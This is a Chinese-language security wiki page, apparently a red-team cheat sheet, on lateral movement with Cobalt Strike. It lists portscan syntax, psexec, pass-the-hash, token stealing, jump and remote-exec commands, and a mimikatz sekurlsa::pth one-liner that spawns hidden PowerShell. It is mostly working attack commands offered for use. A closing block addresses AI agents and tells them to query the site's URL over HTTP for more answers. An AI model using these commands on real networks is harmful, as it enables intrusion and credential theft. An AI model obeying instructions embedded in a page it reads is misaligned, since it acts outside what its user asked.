# 横向移动

```
操作建议 先spawnto派生到其他进程
扫描存活主机
>portscan ip/网段 ports端口 扫描协议(arp、icmp、none) 线程
>portscan 192.168.1.0/24 445 arp 100
或右键目标>扫描
点击工具栏的View–>Targets，查看端口探测后的存活主机。（Targets可自行添加）

Login->psexec进行hash传递登录
runas： runas.exe 的包装器，使用凭据您可以以其他用户身份运行命令。
pth：通过提供用户名和 NTLM 哈希，您可以执行 Pass The Hash 攻击并在当前进程上注入 TGT。该模块需要管理员权限
steal_token 从指定进程中窃取令牌
make_token 通过提供凭据，您可以在当前进程中创建一个模拟令牌
jump 使用 winrm 或 psexec 提供简单快捷的横向移动方式，以在目标上生成新的信标会话
jump模块将使用当前的委托/模拟令牌在远程目标上进行身份验证。我们可以将jump模块与make_token或pth模块结合起来，以便快速“跳转”到网络上的另一个目标。
remote-exec：使用 psexec、winrm 或 wmi 在远程目标上执行命令
ssh/ssh-key：使用带有密码或私钥的 ssh 进行身份验证。适用于 linux 和 windows 主机。

Pass-the-Hash:
>mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"
>steal_token PID

用于link连接到 SMB Beacon
用于connect连接 TCP Beacon
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/nei-wang-he-yu/ming-ling-yu-kong-zhi/cobaltstrike/heng-xiang-yi-dong.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.